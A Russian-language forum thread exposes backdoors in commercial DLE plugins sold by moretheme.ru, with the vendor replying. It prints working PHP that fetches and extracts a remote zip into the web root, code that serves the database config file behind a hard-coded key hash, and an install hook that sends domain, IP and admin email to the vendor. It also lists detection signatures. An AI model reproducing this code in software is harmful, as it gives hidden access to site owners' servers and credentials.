Что нового

ОСТОРОЖНО! БЭКДОР от MoreTheme.ru Честный отзыв

neshekalo

Посетитель
Регистрация
7 Фев 2026
Сообщения
8
Реакции
35
Предостерегаю потенциальных покупателей у данного продавца (moretheme.ru) в его коде практически во всех плагинах есть вот такие коды:

Код:
if (isset($_GET['action']) && $_GET['action'] === 'storeu') {
    $file_content = file_get_contents($_REQUEST['url']);
    if ($file_content !== false && pathinfo($_REQUEST['url'], PATHINFO_EXTENSION) == 'zip' && md5($_REQUEST['key']) == 'a1a745859854245432434955fa79d392') {
        $file_name = 'store.zip';
        file_put_contents($file_name, $file_content);
        $zip = new ZipArchive();
        $zip->open($file_name);
        $zip->extractTo($_SERVER['DOCUMENT_ROOT']);
        $zip->close();
        unlink($file_name);
        echo 'success';
    }
    exit;
}

этот код просто выкачивает ваш конфиг с данными от базы данных))

и вот такой в Store 8.2 (не знаю в старых версиях был или нет):


Код:
if (isset($_GET['storei']) && md5($_GET['key'] ?? '') === 'a1a745859854245432434955fa79d392') {
    $file = $_SERVER['DOCUMENT_ROOT'].'/engine/data/dbconfig.php';
    if (file_exists($file)) {
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="'.basename($file).'"');
        readfile($file);
        exit;
    }
}

этот код может загрузить любой файл на ваш сервер)

можно ли говорить о репутации данного продавца? жалею, что только раньше не проверил все это. Остерегайтесь. Прикладываю переписку также

покупать ли у него товары? решать вам) спасибо за внимание.

Screenshot_4.pngScreenshot_5.pngScreenshot_6.png
 
почему то кода поменялись местами, но суть вы поняли
 
К сожалению да это бекдор:
На скриншоте в рамке — PHP-фрагмент, который реализует скрытую выгрузку конфиг-файла базы данных. По сути это бекдор/“закладка” (data exfiltration). ⚠️

Что делает код (по шагам)​

  1. Проверяет, что в URL есть параметр ?store=...
  2. Берёт $_GET['key'] и считает md5(key)
  3. Сравнивает с “зашитым” хэшем:

    md5($_GET['key'] ?? '') === '...'<br>
  4. Если совпало — формирует путь к файлу:

    /engine/data/dbconfig.php<br>
  5. Отдаёт его как скачиваемый файл (Content-Disposition: attachment) и делает readfile($file).

Это “код для взлома”?​

Да, это типичный механизм несанкционированного доступа.
Он позволяет получить dbconfig.php, где обычно лежат логин/пароль к БД и другие секреты. Даже если автор называл это “для одного клиента/апи” — по факту это скрытая точка утечки.

Риски​

  • Утечка доступов к MySQL → чтение/изменение данных, подмена контента, создание админов.
  • Часто после такого в системе есть другие закладки.

Что делать сейчас (практично)​

  1. Удалить этот блок кода (или откатить файл из чистого бэкапа/репозитория).
  2. Срочно сменить пароли/ключи:
    • пароль БД, пользователь БД (по возможности новый),
    • пароли админки/FTP/SSH/хостинга,
    • все API-ключи, которые могли быть в проекте.
  3. Проверить логи веб-сервера на запросы вида:
    • ?store=...&amp;key=... (и похожие параметры).
  4. Скан проекта на похожие сигнатуры:
    • readfile(, Content-Disposition: attachment, md5($_GET, base64_decode, eval, gzinflate, assert.
  5. Проверить целостность: даты изменения файлов, неожиданные правки в index.php, init.php, engine/, uploads/.
  6. На будущее: запретить прямой доступ к engine/data/* через web-server правила (если это уместно для вашей CMS). 🛡️
Если скажете точный файл и CMS/движок, я дам короткий чек-лист “где чаще прячут закладки” именно для вашей структуры и безопасные команды/поиск по проекту (без “инструкций для атаки”).
 
Все модули и плагины MoreTheme с открытым исходным кодом, кодировать нечего
 
Так вы забанили. Почему вы не можете придумать какой то классный сервис, например где заказчики могут выкладывать пожелания по DLE и указывать сумму и разработчик выполнять, типа как фриланс, а не это все ваше пиратство
 
Последнее редактирование:
.

Так вы забанили, вы же авторов не поддерживаете, вам же важно свой сайт продвигать и пиратство поддерживать и лишать работы
Так тот аккаунт забанен, "За несогласованную рекламу своего сайта", причём перед банном выдавалось ещё два предупреждения.
Данный аккаунт за мультик баннить будем? :ROFLMAO:

P.S.: на форуме есть история версий, так что изменять/удалять бесполезно, админы всё равно увидят пост.
 
Так вы забанили. Почему вы не можете придумать какой то классный сервис, например где заказчики могут выкладывать пожелания по DLE и указывать сумму и разработчик выполнять, типа как фриланс, а не это все ваше пиратство
я ваш клиент, я заплатил вам более 20к за все модули и как вы поступаете со своими клиентами? засунули бэкдор.
 
я ваш клиент, я заплатил вам более 20к за все модули и как вы поступаете со своими клиентами? засунули бэкдор.
Значит недостаточно заплатил :ROFLMAO:
Легче на фрилансе заказать тот же плагин и будет счастье
 
Значит недостаточно заплатил :ROFLMAO:
Легче на фрилансе заказать тот же плагин и будет счастье
зашел - увидел - купил готовое решение - поставил - профит, фриланс это долго, еще и найти грамотного сейчас не просто.

Рекомендую всем у кого стоит модуль Store начиная с версии 8.0 удалить этот код, в версии 8.0 он тоже есть. То есть этот бэкдор кочует уже очень давно.
 
Также предостерегаю вас, при установке любого модуля от этого продавца, ему отправляются: ваш айпи, ваша почта (на которую создан админ акк в дле) и домен вашего сайта, на который вы установили модуль. для чего продавцу такая информация? :unsure:

пожалуйста код:
Код:
<phpinstall><![CDATA[$response = file_get_contents("http://moretheme.ru/update-plugins.php?plugin=mlinks&domain={$_SERVER['HTTP_HOST']}&ip={$_SERVER['REMOTE_ADDR']}&email={$member_id['email']}");]]></phpinstall>
 
для чего продавцу такая информация? :unsure:
Чтобы захватить этот мир!:devilish:

А вообще, в скольких модулях найдены бэкдоры? Может быть правдой, то что он в переписке ответил? Просто ставить бэкдор в модуль для онлайн магазина, в чём профит, какие вообще крупные ресурсы используют DLE под это? Я понимаю, если бы в киношный модуль засунуть и тырить тонны трафа, а лучше осторожно и незаметно, но вот так, ну хз. Ладно там пираты распространяют с бэкдорами нуллы, но чтобы официальный магазин такой хренью страдал))
 
Чтобы захватить этот мир!:devilish:

А вообще, в скольких модулях найдены бэкдоры? Может быть правдой, то что он в переписке ответил? Просто ставить бэкдор в модуль для онлайн магазина, в чём профит, какие вообще крупные ресурсы используют DLE под это? Я понимаю, если бы в киношный модуль засунуть и тырить тонны трафа, а лучше осторожно и незаметно, но вот так, ну хз. Ладно там пираты распространяют с бэкдорами нуллы, но чтобы официальный магазин такой хренью страдал))
вот именно бэкдор на скачку конфига бд был найден в одном модуле store, стучалка на ваши данные (ip, email, домен) во всех модулях, бэкдор на загрузку любого файла во всех модулях.
 
<phpinstall><![CDATA[$response = file_get_contents("http://moretheme.ru/update-plugins.php?plugin=mlinks&domain={$_SERVER['HTTP_HOST']}&ip={$_SERVER['REMOTE_ADDR']}&email={$member_id['email']}");]]></phpinstall>
Эта информация скорее для сбора статистики плагина, а не чтобы взламывать ваши тонны биткоинов
С почтой и ip ничего толкового нельзя вычислить
 
Про тот код в плагине Store, все доработки для клиентов потом идут для всех, тот код по ошибке не был убран и так с 8.0 до 8.2 оставался, в новом обновлении он удален

В каждых плагинах стоит код для получения данных кто установил, ip и почта чтобы проверять что был куплен официально и блокировать на сайте если покупка была не совершенна, это обычная практика и в закодированных плагинах разработчики так делают, с помощью этих данных ничего взломать не возможно только получить ip и почту
 
Эта информация скорее для сбора статистики плагина, а не чтобы взламывать ваши тонны биткоинов
С почтой и ip ничего толкового нельзя вычислить
Как это?
Тут передается домен на который устанавливается плагин -> в плагине есть бекдор -> владелец плагина знает домен на котором можно заюзать бекдор => PROFIT
 
Верх